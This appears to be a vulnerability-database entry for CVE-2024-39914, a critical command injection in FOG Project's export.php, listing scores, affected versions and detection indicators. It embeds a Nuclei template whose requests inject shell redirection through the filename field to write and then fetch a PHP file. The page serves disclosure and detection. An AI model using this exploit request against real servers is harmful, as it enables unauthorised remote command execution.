CVE-2024-39914
published 2024-07-12CVE-2024-39914: FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
23.41%
97.5th percentile
FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fogproject | fogproject | < 1.5.10.34 | 1.5.10.34 |
| fogproject | fogproject | < 1.5.10.41 | 1.5.10.41 |
Detection & IOCsextracted from sources · hover to see the quote
- →The injected PHP file is then retrieved via GET /management/<filename>.php; a successful exploit response contains the MD5 of a numeric payload in the body with content-type text/html and HTTP 200.
- →Intermediate exploitation step is confirmed when the export response body contains both 'No HTML files!' and 'HTMLDOC' strings with content-type application/pdf and HTTP 200.
- →The vulnerable code path is in packages/web/lib/fog/reportmaker.class.php; monitor for unsanitised 'filename' values containing shell special characters (e.g., single-quote, redirection operators) passed to this file. ↗
- ·The vulnerability exists only in FOG versions prior to 1.5.10.34; systems running 1.5.10.34 or later are not affected. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
FOG Project < 1.5.10.34 - Remote Command Execution
nuclei·CVSS 9.8
CVE-2024-39914 [CRITICAL] FOG Project < 1.5.10.34 - Remote Command Execution
FOG Project '+>+{{filename}}.php)&type=pdf HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fogguiuser=fog&nojson=2
matchers:
- type: dsl
dsl:
- 'contains_all(body,"No HTML files!","HTMLDOC")'
- 'contains(content_type, "application/pdf")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /management/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{md5(num)}}")'
- 'contains(content_type, "text/html")'
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100f36ff0fdf9a145bb2136b8c66454208981ba03f235950d2f64252ba2af398691022100fee49f7816f2c12444f9dc5c129e97f258936e1b45fbf5eb375a0aa9a2a0940f:922c64590222798bb761d5b6d8e72950
https://github.com/FOGProject/fogproject/commit/2413bc034753c32799785e9bf08164ccd0a2759fhttps://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8jhttps://github.com/FOGProject/fogproject/commit/2413bc034753c32799785e9bf08164ccd0a2759fhttps://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
2024-07-12
Published
Exploited in the wild